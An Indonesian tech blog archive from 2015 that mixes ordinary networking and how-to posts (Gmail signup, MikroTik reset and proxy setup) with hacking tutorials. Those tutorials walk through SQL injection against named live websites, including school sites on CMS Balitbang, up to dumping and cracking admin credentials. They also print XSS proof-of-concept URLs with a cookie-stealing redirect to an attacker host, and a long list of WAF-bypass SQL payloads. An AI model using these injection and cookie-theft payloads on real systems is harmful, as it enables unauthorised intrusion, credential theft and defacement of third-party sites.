Jumat, 31 Juli 2015

Cara Membuat Email Google [Gmail]

Penulis Artikel : Ahmad Lukman Hakim

Berikut saya akan sharing bagaimana cara membuat Email Google (@gmail.com). Ikuti langkah-langkah berikut ini:

1. Buka Browser. (Google Chrome, Mozilla Firefox, IE)
2. Pada Address Bar, tulis : google.com
3. Tulis di kolom pencarian: gmail sign up
4. Kemudian klik Create your Google Account.

5. Isi form pengisian sesuai nama anda. 
Pada form "Choose your username", itu adalah nama email anda nanti. Apabila ada tulisan: "Nama pengguna tersebut sudah digunakan orang lain. Coba yang lain?" Berarti anda harus merubah nama email anda sehingga tidak ada tulisan seperti tersebut. 
Pada form "Create a password": Isi minimal 8 karakter.  Disarankan kombinasi antara huruf dan angka. Lalu ulangi pada form "Confirm your password".
Pada  form "Birthday" isi sesuai Tanggal lahir anda.
Pada form "Gender" isi sesuai Jenis Kelamin anda.
Pada form "Mobile phone" isi dengan No. Hp anda yang masih aktiv (Nanti untuk pengiriman kode konfirmasi).
Pada form "Your current email address" dikosongi saja.
Pada form "Prove that you're not a robot" di cheklist (centang) Skip this.... Karena nanti akan konfirmasi lewat Hp.
6. Pilih lokasi dimana anda tinggal pada form "Location". Lalu cheklist (centang) "I gree to the google..." . Setelah itu >>Next step
7. "Phone number" diisi sesuai nomor Hp anda yang masih aktiv. Lebih jelasnya ikuti langkah seperti gambar dibawah ini. 
8. Tunggu hingga ada pesan masuk dari pihak Google, biasanya ada kode yang diberikan lewat pesan tersebut. Nah, samakan dan isi kode tersebut pada form dibawah ini.
9. Email Google anda sudah jadi. Silahkan anda lanjutkan ke gmail.com jika ingin mengirim atau menerima pesan.
 Loading pada saat masuk ke Email anda.
Ini adalah tampilan Administrator Email Google anda. Ditempat inilah anda akan mengirim dan menerima pesan dari orang lain atau teman anda.

Berikut saya jelasakan sedikit tentang cara menulis pengetahuan menu dalam gambar dibawah ini.


COMPOSE : Untuk menulis / mengirim email ke orang lain atau teman anda. 
Inbox           : Pesan masuk akan ada di bagian ini. 
Sent Mail     : Adalah tempat pesan-pesan email terkirim yang pernah anda kirim.
Draf             : Adalah tempat email yang baru anda tulis (Belum terkirim).
More            : Untuk melihat lebih banyak lagi pilihan dibawah.
Semoga artikel ini bermanfaat bagi anda yang belum mengerti cara membuat email atau mengoperasikan Email, khususnya Email Google (@gmail.com).






Read more

Kamis, 30 Juli 2015

Cara Menampilkan Nama Kita, Versi, Dan Database Pada SQLi Manual


Cara Menampilkan Nama Kita, Versi, Dan Database Pada  SQLi Manual 
-  Baiklah :v kali ini saya mau membagikan Cara Menampilkan Nama Kita, Versi, Dan Database Pada  SQLi Manual yups masih banyak yang belum tau bagaimana caranya :v langsung saja kita cari target :D

Oke setelah terinject dan muncul magic number contohnya seperti ini :

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,3,4,5--+

Seperti yang kita ketahui disitu muncul magic number angka 3 untuk menampilkan nama kita, kita bisa menggunakan concat 
Oke kita contohkan saya ingin menampilkan "Injected By Sec7or Team"

Query akan menjadi seperti ini

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(Injected By Sec7or Team),4,5--+

Tapi itu belum selesai yang harus kita lakukan selanjutnya adalah menkonvert 
"Injected By Sec7or Team" menggunakan hex bisa menggunakan tools yang udah kesebar di gugel atau bisa langsung menggunakan hackbar
download di sini
Pada hackbar ini ada otomatis konvert unhex buatan root-kajj jadi pada saat setekah konvert tidak perlu lagi menambah 0x pada depan hasil konvertan jadi query nya adalah

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(0x496e6a656374656420427920536563376f72205465616d),4,5--+



Baiklah untuk menambah pemanis kita juga print versi dan database nya
query akan menjadi seperti ini

http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,concat(0x496e6a656374656420427920536563376f72205465616d,version(),database()),4,5--+

Tampilan di atas masih acak acak kalian bisa menambahkan sendiri spasi atau mempermanis dengan menambah tag html :*

Tambahan :

user() : menampilkan user
version() : menampilkan versi
database() : menampilan database

Jika masih ada yang ingin ditanyakan silahkan tanyakan pada komentar :v
Happy suntik menyuntik ;v
Read more

Rabu, 29 Juli 2015

DIOS (dump in one shoot) Dengan Hackbar Modif

dios (dump in one shoot) dengan hackbar modif

halo sobat injector..
kali ini saya akan ngasih sedikit trik gimana injeksi sql dengan hackbar modif.
kenapa harus hackbar modif..kenapa tidak hackbar yg original saja...
kalo pertanyaan itu sempat terlintas di benak sobat injector, jawabanya simple karena kemampuan dan kelengkapan querynya.
di dalam hackbar yg original hanya tersedia query untuk basic sql saja..sedangkan dalam beberapa kasus ada beberapa website yang menggunakan  waf sebagai pengamanan website

untuk hackbar modif bisa di donlod di sini...download di sini
ok langsung aja menuju tekape..

sebagai percobaan kita gunakan live target http://mediabisnistelematika.co.id/viewevent.php?id_event=9

pertama kita test url dengan menambahkan tanda kutip (')



muncul eror atau sebagian artikel/gambar hilang,, berarti injeksi dapat kita lanjutkan.

lakukan perintah order by hingga menemukan kolom eror.

ternyata pada web ini eror terdapat pada kolom 7
selanjutnya gunakan perintah union select
angka ajaib yang muncul 3 dan 4

ok next.. jika selama ini kita hanya tau group_concat(table_name)  untuk dump daleman web, maka dengan hackbar modig ini kita tidak perlu repot2 untuk mengetik querynya..karena semua sudah tersedia,lengkap,praktis dan tentunya lebih rapi... kita hanya tinggal blok angka ajaibnya kemudian
klik union based dios mysql,dios by madblod...


dan wala............... semua sudah tersaji secara lengkap di depan anda...tanpa perlu repot memasukan querynya satu persatu.....

jika ingin melihat tampilan yg berbeda bisa gunakan dios yg lain..bisa di coba satu persatu... gmana sobat injector..cukup mudah bukan, ternyata sqli tidak serumit yang di bayangkan...


happy injecting...
Read more

Mengenal Lebih Dekat 'Senjata' Para Injector.


halo sobat injector.. kali ini saya akan membahas tools wajib para injector yaitu hackbar.
apa sih hackbar itu... hackbar adalah salah satu plugins/addons pada browser mozila.

bagi kaum injector..hackbar memang sudah tidak asing lagi..tapi bagi para pemula seperti saya mungkin masih butuh penyesuaian..apalagi jika selama ini kita adalah user havij atau sqlmap.
selama ini kita hanya mengenal hackbar yg secara umum cuma di gunakan untuk basic sql.

tapi kini para leet sql injector sudah memodifikasi hackbar sedemikian rupa sehingga lebih mudah di gunakan dan tentunya lebih powerfull,karena di lengkapi dengan DIOS(dump in one shoot) baik itu untuk mysql,mssql ataupun error based dios.

dan kerennya lagi hackbar modifan ini di lengkapi dengan query string yang di gunakan untuk membypass WAF..yangg kadang-kadang bikin kita pusing tujuh keliling.

berikut penampakan hackbar modifannya..



silahkan download di sini.. download di sini



happy injecting...

Read more

Bug XSS Di CMS Balitbang All Version


halo sobat injector.. kali ini akan kami bagi satu lagi bug di web berbasis cms balitbang... cekidot...:D

# Exploit Title:: bug XSS on CMS balitbang all version
# Date :: 2015-07-13
# Homepage:https ::divisidatalitbang.net
# Exploit Author:: Minato
# Dork :: site:sch.id atau bisa dikembangin lagi
==================
VULNERABLE CODE
==================
functions\fungsi_artikel.php:$kd=$_POST['kode'];
functions\agenda.php:$kode = $_GET['kode'];
functions\functions_download.php: $kode=$_GET['kode'];
functions\functions_mem.php:$kode=$_GET['kode'];
functions\fungsi_berita.php:$kd=$_GET['kode'];
dan bnyk lagy yg lainnya
# POC
http://www.sman11-smg.sch.id/html/index.php?id=artikel&kode=33'><script>alert(document.cookie)</script>
http://www.sman11-smg.sch.id/html/index.php?id=berita&kode=73'><script>alert(document.cookie)</script>
# XSS concept attacking ::GET PHPSESSID untuk menjadi admin
<script>window.location="http://www.site-attacker.com/xss-stealer.php?cookie=document.cookie";</script>
http://www.sman11-smg.sch.id/html/index.php?id=berita&kode=73'><script>window.location="http://www.site-attacker.com/xss-stealer.php?cookie=document.cookie";</script>

nantikan trik trik sqli kami selanjutnya...:D
Read more

Selasa, 28 Juli 2015

MACAM MACAM BYPASS WAF

dalam dunia injector kita tidak asing lagi dengan istilah WAF.
apasih waf itu... waf adalah kepanjangan (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

jadi.....rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** )

untuk itu saya akan sedikit berbagi tentang jenis2 waf yg biasa di gunakan dalam dunia injector..:D

[~] order by [~]

/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]

/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

[~] information_schema.tables [~]

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

[~] concat() [~]

CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

[~] group_concat() [~]

/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)

gmana...lumayan banyak kan... ga usah di hafal...ntar bikin botak...
karena sebagai sulusinya udah sya sertakan hackbar yg sudah include byapass wafnya.
bisa di donlod di sini hackbar modif

happy injecting...:D
WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf
WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpu
WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...

rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf

WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...


rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf

WAF itu (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum...


rata2 web yang udah di
pasang waf itu kebal sama SQL Injection yang basic atau sql injection dengan statement error ( ' ) atau ( /** ) - See more at: http://indonesiahackercyberteam.blogspot.com/2013/12/bypass-sql-dengan-waf.html#sthash.YesIXDfl.dpuf
Read more

SQL INJECTION ON CMS BALITBANG

sql injection on cms balitbang
selamat datang dan selamat berkunjung para injector...:D
kali ini sya akan ngasih tutorial injeksi website pada cms balitbang.
seperti yang kita tahu cms balitbang memiliki banyak celah..mulai dari default password hingga registration member dengan inspect element.
tapi kali ini saya tidak akan membahas bug-bug di atas. saya akan fokus gmana masuk ke web berbasis cms balitbang dengan tekhnik sql injection.
ok..lets start..

alat2 yang di butuhkan

-kompi (wajib hukumnya.. :D)
-koneksi internet
-browser disarankan memakai mozilla firefox (karena kita akan menggunakan addons hackbar)
-hackbar. di sini sy memakai hackbar modifan. karena di dalmnya sudah include dios dan query untuk membypass waf. bisa di donlod di sini
 download di sini

otomatis terdownload,kemudian klik allow..kemudian kilk installnow otomatis addons hackbar terinstall di browser anda. "penting di ingat bahwa hackbar di atas sangat berguna untuk kita melakukan injeksi"
-untuk dorknya silahkan berkreasi sendiri..

anggap aja kita udah punya targetnya,. di sini saya gunakan live target http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17&profil=Sarana+&+Prasarana

kita buka browser mozilla kita ..
kita lakukan test pada url dengan menambahkan tanda kutip ( ' )
http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17'&profil=Sarana+&+Prasarana

dan ternyata sebagian file hilang. berrarti bisa di pastikan web vuln sqli.
selanjutnya kita masukkan injeksi kita dengan cara http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+order+by+1--+&profil=Sarana+&+Prasarana
lakuan secara berutuan hingga ketemu erornya.. ok..ternyata eror ada di kolom  8


selanjutnya kita masukan perintah union select untuk mencari angka injeksinya http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+and+0+union+select+1,2,3,4,5,6,7,8--+-&profil=Sarana+&+Prasarana
ternyata muncul muncul angka ajaib yaitu 2 dan 3.




selanjutnya di sinilah fungsi hackbar kita tadi yaitu untuk melakukan dios(dump in one shoot)
buka hackbar dengan cara klik tools/show/hide hackbar atau tekan f9

kita blok angka ajaibnya di hackbar yaitu angka 3 kemudia klik UNIOON BASED -DIOS mysql -dios by madblood kemudian klik execute..(lihat gambar)



dannnn...wala...... muncul semua daleman webnya..;D


selanjutnya kita dump isi username dan passwordanya... bingo..... balitbang owned..:D

langkah selajutnya silahkan crack passwordnya dan silahkan login...tapi ingat jangan tebas index.

sekian tutorial cupu dr saya...maaf kalo ada salah2 dalam penulisan maklum masih belajar bikin tutorial kak..

NB: hackbar di atas bisa di gunakan juga untuk dios web lain.. mulai dari eror based hingga dios mssql.. untuk tutorial selanjutnya harap bersabar..makasih udah berkunjung..


Read more

Senin, 27 Juli 2015

Cara Reset Routerboard MikroTik [Hardware]

Penulis Artikel : Ahmad Lukman Hakim
Berikut saya akan menulis artikel tentang cara mereset Routerboard MikroTik. Saya disini menggunakan series RB 700, seperti RB 711, 750, 751, dsb. Ini adalah cara mereset routerboard MikroTik secara HARDWARE. Saya yakin kalau cara mereset routerboard MikroTik secara SOFTWARE itu lebih mudah daripada secara HARDWARE dan caranya tidak sebarang menekan tombol reset saja, tetapi ada prosedur yang harus diperhatikan baik-baik. 

Berikut prosedur cara reset Routerboard MikroTik secara hardware:
1. Pastikan semua kabel UTP tidak ada yang terhubung ke port Ethernet.
2. Pastikan kabel Adaptor atau kabel Power tidak tercolok ke routerboard (harus router dalam keadaan off)
3. Ambil pena (atau alat lain yang kecil-lancip dan tidak mudah patah) yang bisa masuk ke lubang tombol reset routerboard.

4. Tekan tombol reset-nya sampai berbunyi 'tek' dan tahan (jangan dilepas) tetap kondisikan seperti tersebut lalu ambil kabel adaptor (power) dan colokan. Ini dilakukan dengan tetap menekan tombol resetnya
"Jika tombol reset terlepas pada saat proses mencolokan kabel adaptor (power) maka anda harus mengulangi prosedur no.4"
5. Tetap dalam kondisi tersesebut, tunggu sampai anda melihat lampu (LED) ACT menyala, tetap dalam kondisi tersebut sampai lampu ACT mati.
6. Masih dalam kondisi menekan tombol reset, tunggu lampu indikator port Ethernet menyala sebentar kemudian mati. Biasanya membutuhkan waktu 20-40 detik.
7. Setelah semua lampu indikator pada port Ethernet menyala kemudian padam. Lepaskan kabel adaptor (power), sehingga routerboard dalam keadaan off.
8. Colokan kembali kabel adaptor (power) untuk menghidupkan routerboard.
9. Routerboard sudah dalam keadaan default configuration. Anda bisa memulai konfigurasi dari awal.

Semoga dapat bermanfaat bagi pembaca yang belum tahu prosedur yang benar bagaimana itu me-reset routerboard MikroTik.


Read more

Minggu, 26 Juli 2015

Ikuti Mikrotik User Meeting Yogyakarta - Oktober 2015

Mikrotik User Meeting (MUM) akan kembali diselenggarakan di Indonesia. Setelah 2 tahun berturut-turut diselenggarakan di Yogyakarta, tahun 2015 ini juga akan diselenggarakan di tempat yang sama. Ada yang belum tau apa itu Mikrotik User Meeting (MUM)?


Apa itu Mikrotik User Meeting (MUM)?

Mikrotik User Meeting (MUM) adalah Sebuah konferensi dan pertemuan antar penggiat Mikrotik yang membahas tentang Software Mikrotik RouterOS dan, Hardware Mikrotik RouterBoard. Pada konferensi Mikrotik ini terdapat beberapa expert Mikrotik Indonesia dan Mancanegara yang berbagi informasi melalui presentasi tentang Mikrotik. Anda dapat mengajukan pertanyaan tentang topik tersebut. Ada juga Demo penggunaan teknologi terbaru Mikrotik, pengenalan produk baru, semua ada disini.
Selengkapnya tentang MUM bisa anda baca disini :
Apa itu Mikrotik User Meeting (MUM)?

MUM Indonesia tahun ini diselenggarakan di tempat yang sama, yakni di :
Royal Ambarrukmo, Jl. Adi Sucipto No. 81, Yogyakarta 55281

Acara ini akan dilaksanakan pada :
9 - 10 Oktober 2014


Penasaran dengan agenda Acara MUM tahun lalu?
Download Materi & Video MUM Indonesia - Yogyakarta 5-6 Desember 2014

Anda tertarik mengikuti event ini? Silakan daftar disini GRATIS.
mum.mikrotik.com/2015/ID/info



Setelah proses pendaftaran selesai, anda akan diberi tiket dalam bentuk .pdf seperti ini :



Silakan cetak dan potong tiket nya, lalu bawa pada saat hari pelaksanaan.

Oke, sampai jumpa di MUM Indonesia Yogyakarta 9 - 10 Oktober 2015.
Read more

Kamis, 16 Juli 2015

Selamat Hari Raya Idul Fitri 1436 H

Assalamu'alaikum Wr. Wb.
Alhamdulillah, puji syukur kami panjatkan ke hadirat Allah SWT, karena dengan rahmat Nya lah kita semua bisa kembali bertemu hari yang Fitri di tahun 2015 atau 1436 H ini.

Pada hari yang fitri ini, Saya mohon maaf apabila di dalam blog ini ada sesuatu hal yang tidak berkenan di hati pembaca sekalian. Mungkin ada beberapa dari pembaca sekalian yang berkomentar dan mengajukan pertanyaan baik di blog MikrotikIndo ini maupun di Fans Page Facebook namun tidak ada jawaban. Saya mohon maaf yang sebesar-besarnya karena kesibukan dan aktifitas saya sehari-hari yang padat sehingga tidak sempat membalas komentar dan pertanyaan pembaca sekalian satu per satu. Semoga bisa dijadikan maklum.

Saya ucapkan banyak terimakasih karena pembaca sekalian telah bersedia membaca tulisan saya di blog ini. Semoga apa yang saya tuliskan di blog ini dapat memberikan manfaat bagi pembaca sekalian.



Saya Rizky Agung Pratama selaku admin dari blog dan Facebook Fans Page MikrotikIndo mengucapkan Selamat Hari Raya Idul Fitri 1436 H Mohon maaf lahir dan bathin.

Akhir kata, Wassalamu'alaikum Wr. Wb.

Banjarnegara, 1 Syawal 1436 H

Read more

Rabu, 15 Juli 2015

Membuat Proxy Eksternal Mikrotik Menggunakan RouterOS Mikrotik

Assalamualaikum warahmatullahi wabarokatuh.........

Sebelumnya kami dari mikrotikindo.blogspot.com mengucapkan "Minal aidin Wal faidzin" Mohon Maaf Lahir Batin.

jika kami pernah menyinggun atau membuat kesalahan, baik disengaja maupun tidak disengaja mohon di "Maafkan" :)


Semoga  agan’ dan agan wati sehat selalu yh 
Sebelum kami mudik lebaran besok pagi, insya Allah semoga selamat sampai ditujuan :) 

Malam ini saya akan nge-share sedikit pengetahuan kami tentang  bagaimana membuat web proxy eksternal, Sebelumnya kami perna nge-post  cara Menambah Cache Proxy Mikrotik Menggunakan USB Flashdisk 

Tetapi pada postingan kali ini sangat berbeda dimana yang akan menjadi proxy eksternya adalah Menggunakan mikrotik itu sendiri hihiihihiihi



Baiklah langsung saja saya mengganbarkan topologi logikalnya seperti dibawah ini


1.  Melakukan konfigurasi pada router GW mikrotik
Lakukan pada terminal :

Ip ad ad ad=192.168.137.2/24 int=ether1

Ip ad ad ad=10.10.10.1/30 int=ether2

Ip ad ad ad=192.168.0.254/24 int=ether3

Ip dns set all=yes ser=118.98.44.100,118.98.44.10

Ip firewall nat nat add chain=dstnat src-address=192.168.0.0/24 protokol=tcp \
dst-port=80  action=dst-nat to-address=10.10.10.2 to-port=8080

Ip firewall nat add ch=srcnat out-interface=ether1 action=masquerade

Ip route ad gateway=192.168.137.1




2.    Melakukan konfigurasi pada router Web-proxy
Lakukan di terminal

Ip ad ad ad=10.10.10.2/30 int=ether1

Ip dns set all=yes ser=118.98.44.100,118.98.44.10

Ip proxy set enable=yes port=8080 cache-administrator=anshar201@gmail.com cache-on-disk=yes max-cache-size=unlimited

Ip route ad gateway=10.10.10.1






Result :

  • Mengakses mikrotikindo.blogspot.com
  • Keadaan pada router GW

  • Keadaan pada Router Proxy





the end, thanks for reading.
Read more

Jumat, 10 Juli 2015

Cara Jitu Menghapus Blog di Wordpress.com

Penulis Artikel : Ahmad Lukman Hakim
Sebelumnya, kenapa saya ingin menghapus blog saya di Wordpress? Jawab: karena saya ingin memulai menulis lagi dari Awal di platform Blogger. Issue dari guru saya, untuk bisa berbisnis Google Adsense yang mudah kita harus menggunakan platform Google juga, jadi saya hapus blog saya yang di platform Wordpress. Itulah alasan saya.

Tidak usah panjang lebar saya berkata, lebih baik sesuai tujuanya yaitu menulis artikel tentang "Cara menghapus Blog Wordpress". Berikut langkah-langkahnya yang disertai gambar supaya pembaca lebih cepat actions :
1. Sebelumnya, anda harus Login ke Dashbor Wordpress anda.
2. Selanjutnya silahkan pilih menu Tools/Perkakas/Plugin, ketika kita klik maka akan muncul sub-menu dibawahnya, Pilih Remove Site/Hapus Blog.
3. Berikut adalah pertanyaan yang diberikan oleh pihak wordpress. Karena saya ingin menulis/blogging di platform Blogger maka saya pilih "Saya menggunakan platform lain."
Seseorang pasti ada alasanya, kenapa ingin menghapus blognya. Jadi pilih sesuai alasan anda.
4. Kemudian pilih Blogger.
Berbeda jika pada langkah di nomor 3 anda memilih alasan yang lain.
5. Nah, silahkah !!! backup dulu semua isi blog anda. Pilih Ekspor/Export.
6. Kemudian pilih apa yang mau anda ekspor. Karena saya akan mengekspor semua isi maka saya pilih Semua Isi lalu Unduh Berkas Ekspor untuk download file eksporanya.
7. Klik Hapus Sekarang untuk menghapus Blog wordpress anda.
8. Berikan tanda Cheklist - Lihat pada Gambar. Lalu Hapus Sekarang.
9. Anda disuruh untuk Confirmasi Penghapusan. Cek email anda untuk mengkonfirmasi.
10.Nah, Klik link konfirmasinya.
Blog Wordpress Anda telah dihapus.

Semoga bermanfaat,,, #luxsmart





Read more

Kamis, 09 Juli 2015

Modal Awal dan Tips Belajar Router MikroTik

Penulis Artikel : Ahmad Lukman Hakim
 
Saya akan sharing sedikit tentang modal utama bisa router MikroTik. Banyak sekali tutorial-tutorial di blog orang lain yang mungkin membahas tentang modal utama seseorang bisa menguasai router MikroTik. Tetapi tujuan saya menulis artikel ini adalah: 1). Untuk update artikel di blog 2). Untuk berbagi ilmu kepada pembaca yang mungkin penasaran bagaimana cara supaya mahir mengoperasikan router MikroTik 3). Sebagai bahan dokumentasi diri saya sendiri, mungkin suatu saat ada orang bertanya, atau bahkan teman sediri bertanya: 
"Hey kawan... saya mau belajar router MikroTik nih... Apa yang harus aku persiapkan ya, atau modal/ilmu awal yang harus saya kuasai?"
Disitulah, saya akan memberikan jawabanya lewat artikel ini. :D

Begitulah tujuan saya menulis artikel tentang "Modal Awal Belajar Router MikroTik", sekarang saya akan menjelaskan langkah demi langkah yang harus anda kuasai.
Belajar itu harus sabar ya? Walaupun sedikit demi sedikit, yang penting rajin. Nanti akan tahu sendiri, "Yang Penting RAJIN membaca, mencoba, bertanya jika tidak tahu kepada teman atau guru yang lebih mengerti.
Oke! Sekarang saya akan memberikan langkah-langkah secara umum bagaimana caranya supaya kita bisa mahir menggunakan MikroTik.

1. Menguasai Dasar Jaringan
Minimal anda sudah pernah membuat jaringan LAN biasa untuk sharing file, printer, dsb. Anda juga harus mengerti apa itu IP Address (prefix "/", subnetmask, netID, hostID, broadcast, dsb.)

2. Aplikasi Internet
Aplikasi internet disini maksudnya anda mengerti bagaimana menggunakan aplikasi Browser biasanya, seperti: Mozilla Firefox, Google Chrome, IE. Anda mengerti bagaimana menghapus cache, setting Proxy Manual, dll. Untuk aplikasi Download Manager juga membantu anda untuk pengujian konfigurasi Router MikroTik.

3. Pengujian Jaringan
Pengujian jaringan disini masksudnya bisa menggunakan perintah "ping" pada Command Prompt.

4. TCP/IP Fundamental
